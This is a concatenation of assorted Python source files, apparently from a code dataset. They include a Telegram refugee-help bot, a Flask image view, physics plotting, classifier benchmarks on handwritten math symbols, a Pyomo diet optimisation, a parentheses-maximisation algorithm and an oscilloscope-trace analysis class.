'rb').read())\n await bot.send_photo(chat_id=message.chat.id, photo='https://raw.githubusercontent.com/d-k-git/tg-bot/main/logo.png')\n #await bot.send_photo(chat_id=message.chat.id, photo=types.InputFile.from_url('logo.png'))\n await bot.send_message(\n chat_id=message.chat.id,\n reply_markup=choose_lang,\n text=\"Привет, я справочный чат-бот. Помогу вам. Выберите язык:\")\n\n# Пишем команду с приветствием и заставкой\n@dp.message_handler(commands=['language'])\nasync def callback_language(message: Message):\n await bot.send_message(\n chat_id=message.chat.id,\n reply_markup=choose_lang,\n text=\"Выберите язык:\")\n\n await send_analytics(user_id=message.from_user.id,\n user_lang_code=message.from_user.language_code,\n action_name='select_lang_rus')\n\n# Создаем первую клавиатуру c выбором языка\nchoose_lang = InlineKeyboardMarkup().row(\n InlineKeyboardButton(text=\"Українськa\", callback_data=\"get-UKR\"),\n InlineKeyboardButton(text=\"Русский\", callback_data=\"get-RUS\"))\n\n\n# Указываем, что сделать при нажатии на кнопку после выбора языка:\n@dp.callback_query_handler(lambda c: c.data == 'get-UKR')\nasync def get_UKR(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=chosen_ukr,\n text=\"Виберіть країну:\")\n\n await send_analytics(user_id=message.from_user.id,\n user_lang_code=message.from_user.language_code,\n action_name='select_lang_ukr')\n\n@dp.callback_query_handler(lambda c: c.data == 'get-RUS')\nasync def get_RUS(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=chosen_rus,\n text=\"Выберите страну:\")\n\n\n# --------- ЗДЕСЬ ВЫБОР СТРАНЫ И РАЗДЕЛА ---------\nchosen_rus = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Германия\", callback_data=\"DEU_rus\"),\n InlineKeyboardButton(text=\"Польша\", callback_data=\"POL_rus\"),\n)\nchosen_ukr = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Німеччина\", callback_data=\"DEU_ukr\"),\n InlineKeyboardButton(text=\"Польща\", callback_data=\"POL_ukr\"),\n)\n\n\n# ------- Доступные разделы по стране: ГЕРМАНИЯ -------\nDEU_chosen_service_rus = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Безопасность\", callback_data=\"DEU_sec_main_rus\"),\n)\n\nDEU_chosen_service_ukr = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Безпека\", callback_data=\"DEU_sec_main_ukr\"),\n)\n\n\n# ------- Доступные разделы по стране: ПОЛЬША -------\nPOL_chosen_service_rus = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Безопасность\", callback_data=\"POL_sec_main_rus\"),\n InlineKeyboardButton(text=\"Медицина\", callback_data=\"POL_med_main_rus\"),\n InlineKeyboardButton(text=\"Работа\", callback_data=\"POL_wrk_main_rus\"),\n InlineKeyboardButton(text=\"Проживание\", callback_data=\"POL_res_main_rus\"),\n InlineKeyboardButton(text=\"Юридическая помощь\", callback_data=\"POL_law_main_rus\"),\n InlineKeyboardButton(text=\"Бытовые вопросы\", callback_data=\"POL_day_main_rus\"),\n)\n\nPOL_chosen_service_ukr = InlineKeyboardMarkup(row_width=2).add(\n InlineKeyboardButton(text=\"Безпека\", callback_data=\"POL_sec_main_ukr\"),\n InlineKeyboardButton(text=\"Медицина\", callback_data=\"POL_med_main_ukr\"),\n InlineKeyboardButton(text=\"Робота\", callback_data=\"POL_wrk_main_ukr\"),\n InlineKeyboardButton(text=\"Проживання\", callback_data=\"POL_res_main_ukr\"),\n InlineKeyboardButton(text=\"Юридична допомога\", callback_data=\"POL_law_main_ukr\"),\n InlineKeyboardButton(text=\"Побутові питання\", callback_data=\"POL_day_main_ukr\"),\n)\n\n\n@dp.callback_query_handler(lambda c: c.data == \"DEU_rus\")\nasync def DEU_rus(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=DEU_chosen_service_rus,\n text=\"Выберите вид помощи:\")\n\n await send_analytics(user_id=message.from_user.id,\n user_lang_code=message.from_user.language_code,\n action_name='DEU_chosen_service_rus')\n\n@dp.callback_query_handler(lambda c: c.data == \"POL_rus\")\nasync def POL_rus(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=POL_chosen_service_rus,\n text=\"Выберите вид помощи:\")\n\n await send_analytics(user_id=message.from_user.id,\n user_lang_code=message.from_user.language_code,\n action_name='POL_chosen_service_rus')\n\n\n@dp.callback_query_handler(lambda c: c.data == \"DEU_ukr\")\nasync def DEU_ukr(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=DEU_chosen_service_ukr,\n text=\"Виберіть вид допомоги:\")\n await send_analytics(user_id=message.from_user.id,\n user_lang_code=message.from_user.language_code,\n action_name='DEU_chosen_service_ukr')\n\n\n@dp.callback_query_handler(lambda c: c.data == \"POL_ukr\")\nasync def POL_ukr(message: Message):\n await bot.send_message(\n chat_id=message.from_user.id,\n reply_markup=POL_chosen_service_ukr,\n text=\"Виберіть вид допомоги:\")\n\n\n# --------- ЗДЕСЬ ДЕРЕВО ПО РАЗДЕЛАМ И СТРАНАМ ---------\n# ------- РАЗДЕЛ: БЕЗОПАСНОСТЬ -------\n# ----- СТРАНА: ГЕРМАНИЯ -----\n# --- Кнопка БЕЗОПАСНОСТЬ : \"Безопасность\" ---\n# - Язык русский -\n# Клавиатура:\nDEU_sec_main_rus_buttons = InlineKeyboardMarkup(row_width=1)\nDEU_sec_main_rus_buttons = DEU_sec_main_rus_buttons.add(\n InlineKeyboardButton(text=(\n \"Другие варианты поддержки\"),\n callback_data=\"DEU_sec_other_rus\"),\n InlineKeyboardButton(text=(\n \"Как себя обезопасить\"),\n callback_data=\"DEU_sec_selfprotect_rus\"),\n InlineKeyboardButton(text=(\n \"Как распознать сутенёра и узнать, легальна ли работа\"),\n callback_data=\"DEU_sec_illegal_rus\"),\n InlineKeyboardButton(text=(\n \"Список ресурсов для помощи беженцам\"),\n callback_data=\"DEU_sec_general_rus\"),\n )\nDEU_sec_main_rus_buttons = DEU_sec_main_rus_buttons.row(\n InlineKeyboardButton(text=(\n \"🗂 К разделам\"), callback_data=\"DEU_rus\"),\n InlineKeyboardButton(text=(\n \"🌍 Другая страна\"), callback_data=\"get-RUS\"),\n InlineKeyboardButton(text=(\n \"🆘 SOS\"), callback_data=\"DEU_sec_main_rus\"))\n\n\n[...]\n\n\n# --------- ЗДЕСЬ ЗАКАНЧИВАЕТСЯ ДЕРЕВО ПО РАЗДЕЛАМ И СТРАНАМ ---------\n\n\nif __name__ == \"__main__\":\n # dp.register_message_handler(DEU_sec_other_rus, state=\"*\")\n executor.start_polling(dp)\n","sub_path":"Telegram_bot.py","file_name":"Telegram_bot.py","file_ext":"py","file_size_in_byte":8953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"309633438","text":"from flask import abort, current_app, render_template, jsonify, send_file\nfrom flask_classful import FlaskView, route\nfrom werkzeug.exceptions import NotFound\nfrom utils.image_utils import ImageCache\nimport traceback\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass ImageView(FlaskView):\n @route('//')\n @route('/', defaults={'size': 1920})\n def index(self, size, path):\n try:\n cache = ImageCache.from_config(current_app.config)\n info = cache.get_image_info(path, size)\n did_cache = cache.cache_image(info)\n if current_app.config['ENV'] == 'production' and not did_cache:\n msg = ('Serving existing cached image in production env!'\n 'Static files should be sent by the web server.'\n '{}'.format(info))\n logger.warning(msg)\n return send_file(info.cached_path)\n except (KeyError, IOError, NotFound):\n logger.info('Image not found: {} ({}w)'.format(path, size))\n if current_app.config['ENV'] == 'production':\n abort(404)\n else:\n return traceback.format_exc()\n","sub_path":"app/views/image_view.py","file_name":"image_view.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538378812","text":"#!/usr/bin/env python\nimport ROOT\nimport CMS_lumi, tdrstyle\nimport argparse\nimport plot_functions as plotter\n\ndef main():\n plot_info = getPlotArgs()\n canvas = ROOT.TCanvas(\"canvas\", \"canvas\", 800, 600)\n hist = plotter.getHistFromFile(plot_info)\n if type(hist) == \"\":\n hist_opts = \"colz\"\n elif plot_info[\"is_data\"]:\n hist_opts = \"e1\"\n line_color = ROOT.kBlack\n fill_color = ROOT.kBlack\n else:\n hist_opts = \"hist\"\n line_color = ROOT.kRed+4\n fill_color = ROOT.kOrange-8\n plotter.setHistAttributes(hist, plot_info, line_color, fill_color)\n plotter.makePlot(hist, hist_opts, plot_info)\ndef getPlotArgs():\n parser = plotter.getBasicParser()\n parser.add_argument(\"-n\", \"--file_name\", type=str, required=True,\n help=\"Name of root file where plots are stored\")\n parser.add_argument(\"--is_data\", action='store_true',\n help=\"Plot histogram with data points\")\n return vars(parser.parse_args())\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"make_plot.py","file_name":"make_plot.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119962622","text":"import numpy as np\nfrom scipy.misc import imread\n\nwith open('./train.csv', 'r') as train_file:\n train_set_des = np.array(list(map(lambda x:x.split(','), train_file.read().split('\\n')[1:-1])))\n\ntrain_set = []\nfor i in train_set_des[:, 0:1].ravel():\n img = imread(i)\n train_set.append(img[:, :, 0:1].ravel())\n\ntrain_set = np.array(train_set)\ntrain_set_label = train_set_des[:, 2:3].ravel()\n\nwith open('./test.csv', 'r') as test_file:\n test_set_des = np.array(list(map(lambda x:x.split(','), test_file.read().split('\\n')[1:-1])))\n\ntest_set = []\nfor j in test_set_des[:, 0:1].ravel():\n img = imread(j)\n test_set.append(img[:, :, 0:1].ravel())\n\ntest_set = np.array(test_set)\ntest_set_label = test_set_des[:, 2:3].ravel()\ntest_set_length = 16992\n\nprint('------------ k nearest neighbors(k vote) ----------')\nfrom sklearn.neighbors import KNeighborsClassifier\n\nknn_kvote = KNeighborsClassifier(n_neighbors=5)\nknn_kvote.fit(train_set, train_set_label)\n\nknn_kvote_pred = knn_kvote.predict(test_set)\nknn_kvote_error_rate = (knn_kvote_pred != test_set_label).sum() / test_set_length\nprint('error rate: %f' % knn_kvote_error_rate)\n\nprint('--------------------- linear svm --------------------')\nfrom sklearn.svm import LinearSVC\n\nsvm_lsvc = LinearSVC(dual=False, multi_class='ovr', verbose=False, random_state=233)\nsvm_lsvc.fit(train_set, train_set_label)\n\nsvm_lsvc_pred = svm_lsvc.predict(test_set)\nsvm_lsvc_error_rate = (svm_lsvc_pred != test_set_label).sum() / test_set_length\nprint('error rate: %f' % svm_lsvc_error_rate)\n\nprint('------------------- svm(with kernel trick) ---------------')\nfrom sklearn.svm import SVC\n\nsvm_svc = SVC(kernel='poly', tol=1e-4, random_state=233, verbose=True, decision_function_shape='ovr')\nsvm_svc.fit(train_set, train_set_label)\n\nsvm_svc_pred = svm_svc.predict(test_set)\nsvm_svc_error_rate = (svm_svc_pred != test_set_label).sum() / test_set_length\nprint('error rate: %f' % svm_svc_error_rate)\n\nprint('------------------- feed-forward neural network -----------')\nfrom sklearn.neural_network import MLPClassifier\n\nffnn = MLPClassifier(hidden_layer_sizes=(400, 400, 400, 400), tol=1e-6, activation='tanh', solver='adam', verbose=True)\nffnn.fit(train_set, train_set_label)\n\nffnn_pred = ffnn.predict(test_set)\nffnn_error_rate = (ffnn_pred != test_set_label).sum() / test_set_length\nprint('error rate: %f' % ffnn_error_rate)\n\n","sub_path":"HASYv2/classification-task/fold-1/MathSymbolRecog.py","file_name":"MathSymbolRecog.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45167767","text":"from pyomo.environ import *\n\n# abstract Wyndor\ndailyReq = ['Carbs', 'Protein', 'Vitamins']\nfeeds = ['Corn', 'Tankage', 'Alfalfa']\ncost_rate = {'Corn': 2.1, 'Tankage': 1.8, 'Alfalfa':1.5}\nmin_nutrients = {'Carbs': 200, 'Protein': 180, 'Vitamins': 150}\nnutrients_per_kg = {\n 'Corn': {\n 'Carbs': 90,\n 'Protein': 30,\n 'Vitamins': 10\n },\n 'Tankage': {\n 'Carbs': 20,\n 'Protein': 80,\n 'Vitamins': 20\n },\n 'Alfalfa': {\n 'Carbs': 40,\n 'Protein': 60,\n 'Vitamins': 60\n }\n}\n\n#Concrete Model\nmodel = ConcreteModel()\n\n#Decision Variables\nmodel.weekly_feed = Var(feeds, domain=NonNegativeReals)\n\n#Objective\nmodel.cost = Objective(expr=sum(cost_rate[fd] * model.weekly_feed[fd]\n for fd in feeds),\n sense=minimize)\nmodel.cost.pprint()\n\nmodel.capacity = ConstraintList()\nfor dr in dailyReq:\n model.capacity.add(\n sum(nutrients_per_kg[fd][dr] * model.weekly_feed[fd]\n for fd in feeds) >= min_nutrients[dr])\n\nmodel.capacity.pprint()\n\n# Solve\nsolver = SolverFactory('glpk')\nsolver.solve(model)\n\n# display solution (again, we've changed to f-strings)\nprint(f\"Min cost = ${model.cost():,.2f}\")\nfor j in feeds:\n print(f\"Kg's of {j} = {model.weekly_feed[j]():.1f}\")","sub_path":"Homework/Lesson 02 Homework - LP2/HW2.5.py","file_name":"HW2.5.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"565864192","text":"#!/usr/bin/env python\n\nimport ScopeTrace \nimport sys, os, pylandau\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.signal import argrelextrema\nfrom itertools import product\nfrom random import choice\nimport numpy.polynomial.polynomial as poly\nimport time\nimport csv\nimport ScopeTrace\n\n#-------------------------------------------------------------------------------#\nclass ScopeData():\n\t\"\"\"\n\tThis is a class to manage a set of ScopeTrace objects.\n\t\"\"\"\n\tdef __init__(self, trace_folder_dir, param_dir=None, plot_dir=None):\n\t\t'''\n\t\tInitializes a ScopeData object.\n\n\t\t:param str trace_folder_dir: Directory to folder containing traces to be analyzed.\n\t\t:param str self.dir: Directory for traces.\n\t\t:param str/None/optional self.param_dir: Directory for the parameter list.\n\t\t'''\n\t\tself.dir = trace_folder_dir\n\t\tself.param_dir = param_dir\n\t\tself.plot_dir = plot_dir\n\n\t@staticmethod\n\tdef pulseFromFile(_dir, filename):\n\t\tscopeData=ScopeData(_dir)\n\t\tdata=scopeData.data_read(filename)\r\n\t\ttemplate=ScopeTrace.ScopeTrace(data)\n\t\treturn template\n\n\tdef data_read(self, filename):\n\t\t'''\n\t\tReturns ScopeTrace object from filename.\n\t\t:param str filename: String of filename. \n\n\t\t'''\n\t\twith open(self.dir + filename, \"r\") as file1: \n\t\t\tdata = file1.read()\n\t\t\treturn data\n\n\n\n\n\tdef save_parameters(self, output_dir=None, filename=None, plotting=False):\n\t\t'''\n\t\tSaves parameters. ::\n\t\t\n\n #Type in the name of the directory where the data files are stored \n\t\t import os, ScopeData\n\t\t directory = #e.g. \"/home/kpark1/Work/SLab/data/\" \n\t\t for file in sorted(os.listdir(directory)):\n\t\t f = ScopeData.ScopeData(directory)\n\t\t f.data_read(file)\n\t\t f.save_parameters(plotting = False)\n\n\t\t:param str/None/optional output_dir: Directory for storing Landau fit parameters: mpv, eta, amp, and jitter (variance). The default directory is working directory.\n\t\t:param str/None/optional filename: Name of a new saved csv files that ends with '.csv'. If None, then the function creates a filename based on the trace folder title. \n\t\t:param bool/optional plotting: If True, it plots each fitted curve. If False, it does not generate any graphs.\n\t\t'''\n\n\t\t#hack to prevent unwanted messages printing\n\t\tclass NullWriter(object):\n\t\t\tdef write(self, arg):\n\t\t\t\tpass\n\t\tnullwrite = NullWriter()\n\t\toldstdout = sys.stdout\n\n\t\t#initialize variables\n\t\tcount = 0\n\t\tlandau_param_list = []\n\t\tzero_time = time.time()\n\t\tfolder_size = len(os.listdir(self.dir))\n\n\t\t#Loops through files\n\t\tfor curr_file in sorted(os.listdir(self.dir)):\n\n\t\t\t#Prints progress\n\t\t\tcount += 1\n\t\t\tif plotting:\n\t\t\t\tprint(str(count) + ' of ' + str(folder_size))\n\t\t\telif time.time() - zero_time > 2:\n\t\t\t\tpercent_done = round(float(count)/float(folder_size) * 100, 2)\n\t\t\t\tprint('Progress: ' + str(percent_done) + '%')\n\t\t\t\tzero_time = time.time()\n\n\t\t\twith open(self.dir + curr_file, \"r\") as file1: \n\t\t\t\tdata = file1.read()\n\t\t\t\ttrace = ScopeTrace.ScopeTrace(data)\n\n\t\t\t#store parameters\n\t\t\ttry:\n\t\t\t\tbaseline, jitter = trace.find_baseline_and_jitter(trace.get_xmin(), trace.get_trigger_point())\n\t\t\texcept:\n\t\t\t\tbaseline, jitter = trace.find_baseline_and_jitter(trace.get_xmin(), trace.get_xmin() + (trace.get_xmax() - trace.get_xmin())/10)\n\t\t\tparameters = trace.parameters()\n\t\t\tlandau_param_list.append([str(curr_file)] + parameters + [jitter])\n\n\t\t\t#plotting\n\t\t\tif plotting:\n\t\t\t\ttrace.plot(fit_param=parameters)\n\t\t\t\tplt.title(str(curr_file))\n\t\t\t\tplt.legend()\n\t\t\t\tself.save('Plot', filename)\n\n\t\t#saving\n\t\tself.save('Data', filename)\n\t\t\n\n\tdef save(string, filename=None):\n\t\tif(string=='Plot'):\n\t\t\tif output_dir == None: #save to working directory if none specified\n\t\t\t\toutput_dir = str(os.getcwd())\n\t\t\t\tprint(output_dir)\n\t\t\tif filename == None:\t#generate filename if not specified\n\t\t\t\tfilename = self.dir.split('/')[-2] + '_plot'\n\t\t\tself.plot_dir = output_dir + '/' + filename\t#saves location of parameters\n\t\t\tplt.savefig(self.plot_dir+'.jpg')\n\t\t\tplt.clf()\n\t\telif(string=='Data'):\n\t\t\tif output_dir == None: #save to working directory if none specified\n\t\t\t\toutput_dir = str(os.getcwd())\n\t\t\t\tprint(output_dir)\n\t\t\tif filename == None:\t#generate filename if not specified\n\t\t\t\tfilename = self.dir.split('/')[-2] + '_parameters'\n\t\t\tself.param_dir = output_dir + '/' + filename\t#saves location of parameters\n\t\t\tsavefile = open(self.param_dir, 'w')\n\t\t\twith savefile:\n\t\t\t\twriter = csv.writer(savefile)\n\t\t\t\twriter.writerow(['Filename', 'MPV', 'Eta', 'Amp', 'Jitter(Variance)'])\n\t\t\t\twriter.writerows(landau_param_list)\n\t\telse:\n\t\t\tprint('error, invalid save type')\n\n\n\n\tdef search_pulses(self, conditions, parameters, and_or='and', plotting=True):\n\t\t'''\n\t\tReturns a list of files that satisfy conditions from a user input with an option of plotting the pulses.\n\t\tRequires a directory where parameters have already been saved.:: \n \n\n #Type in the name of the directory where the data files are stored and the output directory\n\t\t import ScopeData\n\t\t directory = #e.g. \"/home/kpark1/Work/SLab/data/\"\n\t\t f = ScopeData.ScopeData(directory)\n\t\t f.save_parameters()\n\t\t print(f.search_pulses([lambda x: x < .002, lambda x: x < .004],\n ['amp', 'mpv'], plotting = False))\n\n\t \n\n\t\t:param list conditions: List of boolean functions. \n\t\t:param list parameters: List of parameters [mpv, eta, amp] to check if the conditions apply to them. The list must have the same length as conditions. \n\t\t:param str/optional and_or: String of either 'and' or 'or'. If the input is 'and', the method returns files that meet all of the given conditions. If the input is 'or', it returns files that meet any of the conditions. \n\t\t:param bool/optional plotting: If True, it plots the pulses from the data.:: \n\t\t'''\n\t\tstarred_files = []\n\t\tparam_dict = {'mpv': 1, 'eta': 2, 'amp': 3, 'jitter': 4} #maps str parameter input to location in list\n\n\t\t#loop through csv files\n\t\twith open(self.param_dir, 'r') as savefile:\n\t\t\treader = csv.reader(savefile)\n\t\t\tfirstline = True\n\t\t\tfor row in reader:\t#goes through each file's parameters\n\t\t\t\tif firstline:\t#checks if firstline and skips\n\t\t\t\t\tfirstline = False\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tif and_or == 'and':\n\t\t\t\t\t\tmeets_conditions = True\n\t\t\t\t\t\ti = 0\n\t\t\t\t\t\twhile meets_conditions and i < len(conditions): #goes through each condition if all have\n\t\t\t\t\t\t\tmeets_conditions = conditions[i](float(row[param_dict[parameters[i]]])) #been met so far\n\t\t\t\t\t\t\ti += 1\n\n\t\t\t\t\telif and_or == 'or':\n\t\t\t\t\t\tmeets_conditions = False\n\t\t\t\t\t\tfor i in range(len(conditions)): #checks for any met condition\n\t\t\t\t\t\t\tif conditions[i](float(row[param_dict[parameters[i]]])):\n\t\t\t\t\t\t\t\tmeets_conditions = True\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\traise ValueError('Cannot read and/or input')\n\n\t\t\t\t\tif meets_conditions:\n\t\t\t\t\t\tdata_file_dir = self.dir + row[0]\n\t\t\t\t\t\tstarred_files.append(data_file_dir)\n\n\t\t\t\t\t\t#plotting\n\t\t\t\t\t\tif plotting:\n\t\t\t\t\t\t\t#initial settings\n\t\t\t\t\t\t\twith open(data_file_dir, \"r\") as data_file:\n\t\t\t\t\t\t\t\tdata = data_file.read()\n\t\t\t\t\t\t\t\ttrace = ScopeTrace(data)\n\t\t\t\t\t\t\t\ttrace.plot([float(row[1]), float(row[2]), float(row[3])])\n\t\t\t\t\t\t\t\tplt.title(row[0])\n\t\t\t\t\t\t\t\tself.save('Plot')\n\n\t\treturn starred_files\n\n\t\n\tdef histogram(self, parameter, hbins=10, hrange=None, hcolor= 'r', hedgecolor = 'k', halpha = .5):\n\t\t'''\n\t\tMakes a histogram of parameters.\n\t\tReturns a list parameters, a mean value and standard deviation, of Gaussian fit to histogram if parameter == 'eta' or 'jitter'::\n\n\t\t import ScopeData\n\t\t directory = \"/home/$USERNAME/Work/SLab/data/\"\n\t\t f = ScopeData.ScopeData(directory)\n\t\t f.histogram('jitter')\n\t\t plt.show()\n\n\t\t:param string parameter: Name of parameters among jitter, eta, mpv, and amp.\n\t\t:param integer/optional hbins: Number of bins.\n\t\t:param list/optional hrange: Histogram Range \n\t\t:param string/optional hcolor: Color of histogram bins\n\t\t:param string/optional hedgecolor: Color of edges of the bins\n\t\t:param float/optional halpha: Level of transparency in color of bins\n\t\t'''\n\t\tjitter, mpv, eta, amp = [], [], [], []\n\t\twith open(self.param_dir, \"r\") as savefile: \n\t\t\treader = csv.reader(savefile)\n\t\t\tfirstline = True\n\t\t\tfor row in reader:\t#goes through each file's parameters\n\t\t\t\tif firstline:\t#checks if firstline and skips\n\t\t\t\t\tfirstline = False\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tmpv.append(float(row[1]))\n\t\t\t\t\teta.append(float(row[2]))\n\t\t\t\t\tamp.append(float(row[3]))\n\t\t\t\t\tjitter.append(float(row[4]))\n\n\t\tif parameter == 'jitter':\n\t\t\tparam_list = jitter\n\t\telif parameter == 'eta':\n\t\t\tparam_list = eta\n\t\telif parameter == 'mpv':\n\t\t\tparam_list = mpv\n\t\telif parameter == 'amp':\n\t\t\tparam_list = amp\n\t\telse:\n\t\t\traise ValueError(\"Parameter should be 'jitter', 'eta', 'mpv', or 'amp'!\")\n\n\t\tn, bins, patches = plt.hist(param_list, bins=hbins, range=hrange, color=hcolor, edgecolor=hedgecolor)\n\n\t\tbin_avg = []\n\t\tfor i in range(len(bins) - 1):\n\t\t\tbin_avg.append((bins[i] + bins[i+1])/2)\n\t\tbin_avg = np.array(bin_avg)\n\n\t\tnerror = []\n\t\tfor nval in n:\n\t\t\tnerror.append(float(np.sqrt(nval)))\n\t\tnerror = np.array(nerror)\n\n\t\tplt.errorbar(bin_avg, n, nerror, fmt ='o', label = 'Histogram for ' + str(self.dir.split('/')[-2]))\n\n\t\tif parameter == 'eta' or parameter == 'jitter':\n\t\t\ta_initial = max(n)\n\n\t\t\t#gets x values at peaks\n\t\t\tn_array = np.array(n)\n\t\t\tidbin = np.where(n_array == n_array.max())\n\t\t\t#if multiple x values of the same max y values, selects the first max\n\t\t\tidbin = idbin[0][0]\n\t\t\tmean_initial = bin_avg[idbin]\n\n\t\t\tsigma_initial = fwhm(bin_avg, n)\n\t\t\n\t\t\t#Gaussian fit\n\t\t\tlist1 = list(np.linspace(min(bin_avg), max(bin_avg), 100))\n\t\t\tpopt, pcov = curve_fit(gaus, bin_avg, n, p0 = [a_initial, mean_initial, sigma_initial])\n\n\t\t\tplt.plot(list1, gaus(list1, *popt), 'k', label = 'Gaussian Fit for ' + str(self.dir.split('/')[-2]))\n\n\n\t\tplt.xlabel(parameter + ' Value')\n\t\tplt.ylabel('Number of Events')\n\t\tplt.legend()\n\t\tself.save('Plot')\n\n\t\tif parameter == 'eta' or parameter == 'jitter':\n\t\t\treturn [float(popt[1]), float(popt[2])]\n\n","sub_path":"PulsePy/ScopeData.py","file_name":"ScopeData.py","file_ext":"py","file_size_in_byte":9930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"8110678","text":"# Uses python3\nimport sys\n\ndef evalt(a, b, op):\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n else:\n assert False\n\noperands = []\nm = []\nM = []\n\ndef MinAndMax(i,j):\n minimum = sys.maxsize\n maximum = -sys.maxsize - 1\n for k in range(i,j):\n a = evalt(M[i][k], M[k+1][j], operands[k])\n b = evalt(M[i][k], m[k+1][j], operands[k])\n c = evalt(m[i][k], M[k+1][j], operands[k])\n d = evalt(m[i][k], m[k+1][j], operands[k])\n minimum = min(minimum, a, b, c, d)\n maximum = max(maximum, a, b, c, d)\n\n return minimum, maximum\n\n\ndef get_maximum_value(dataset):\n global m,M,operands\n data = list(dataset)\n digits = list(map(int,data[0::2]))\n operands = data[1::2]\n n = len(digits)\n\n m = [[0 for i in range(n)] for j in range(n)]\n M = [[0 for i in range(n)] for j in range(n)]\n\n for i in range(n):\n m[i][i] = digits[i]\n M[i][i] = digits[i]\n\n for s in range(1,n):\n for i in range(n-s):\n j = i+s\n m[i][j], M[i][j] = MinAndMax(i,j)\n #write your code here\n return M[0][n-1]\n\n\nif __name__ == \"__main__\":\n print(get_maximum_value(input()))\n","sub_path":"algorithmic_toolbox/week5/programs/placing_parentheses/placing_parentheses.py","file_name":"placing_parentheses.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512370785","text":"from IPython.display import display\nimport ipywidgets as ipw\nimport numpy as np\nimport bqplot as bqp\nimport ipyvolume as ipv\nimport asyncio\nfrom time import time\n\n# helper functions\ndef amplitude(sigma, omega):\n return(np.sqrt(sigma**2 + omega**2))\n\n# throttling as per https://ipywidgets.readthedocs.io/en/latest/examples/Widget%20Events.html\nimport asyncio\nfrom time import time\n\nclass Timer:\n def __init__(self, timeout, callback):\n self._timeout = timeout\n self._callback = callback\n self._task = asyncio.ensure_future(self._job())\n\n async def _job(self):\n await asyncio.sleep(self._timeout)\n self._callback()\n\n def cancel(self):\n self._task.cancel()\n \ndef throttle(wait):\n \"\"\" Decorator that prevents a function from being called\n more than once every wait period. \"\"\"\n def decorator(fn):\n time_of_last_call = 0\n scheduled = False\n new_args, new_kwargs = None, None\n def throttled(*args, **kwargs):\n nonlocal new_args, new_kwargs, time_of_last_call, scheduled\n def call_it():\n nonlocal new_args, new_kwargs, time_of_last_call, scheduled\n time_of_last_call = time()\n fn(*new_args, **new_kwargs)\n scheduled = False\n time_since_last_call = time() - time_of_last_call\n new_args = args\n new_kwargs = kwargs\n if not scheduled:\n new_wait = max(0, wait - time_since_last_call)\n Timer(new_wait, call_it)\n scheduled = True\n return throttled\n return decorator\n\t\n# sliders styling and whatnot\ndef initialize(isContinousUpdateOn, tArray, yArray, s1Array, s2Array, s1Grid, s2Grid, Y1Array, Y2Array, YPoles, YZeros, y, Y):\n\ttSlider = ipw.FloatSlider(\n\t\tvalue=tArray[0],\n\t\tmin=np.min(tArray), \n\t\tmax=np.max(tArray),\n\t\tdescription='$t$:',\n\t\tdisabled=False, \n\t\tstep=tArray[1] - tArray[0],\n\t\treadout=True,\n\t\treadout_format='.2f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='100%', height='80px'), \n\t)\n\tySlider = ipw.FloatSlider(\n\t\tvalue=yArray[0],\n\t\tmin=np.min(yArray), \n\t\tmax=np.max(yArray),\n\t\tdescription='$y$:',\n\t\tdisabled=True,\n\t\treadout=True,\n\t\treadout_format='.4f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='100%', height='80px'), \n\t)\n\ts1Slider = ipw.FloatSlider(\n\t\tvalue=s1Array[0],\n\t\tmin=np.min(s1Array), \n\t\tmax=np.max(s1Array), \n\t\tdescription='Real[$s$]:',\n\t\tdisabled=False,\n\t\tstep=s1Array[1] - s1Array[0],\n\t\treadout=True,\n\t\treadout_format='.2f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='50%', height='80px'), \n\t)\n\ts2Slider = ipw.FloatSlider(\n\t\tvalue=s2Array[0],\n\t\tmin=np.min(s2Array), \n\t\tmax=np.max(s2Array), \n\t\tdescription='Imag[$s$]:',\n\t\tdisabled=False,\n\t\tstep=s2Array[1] - s2Array[0],\n\t\treadout=True,\n\t\treadout_format='.2f',\n\t\tcontinuous_update=isContinousUpdateOn,\n\t\tlayout=ipw.Layout(width='50%', height='80px'), \n\t)\n\tY1Slider = ipw.FloatSlider(\n\t\tvalue=Y1Array[0,0],\n\t\tmin=np.nanmin(Y1Array[Y1Array != -np.inf]), \n\t\tmax=np.nanmax(Y1Array[Y1Array != np.inf]), 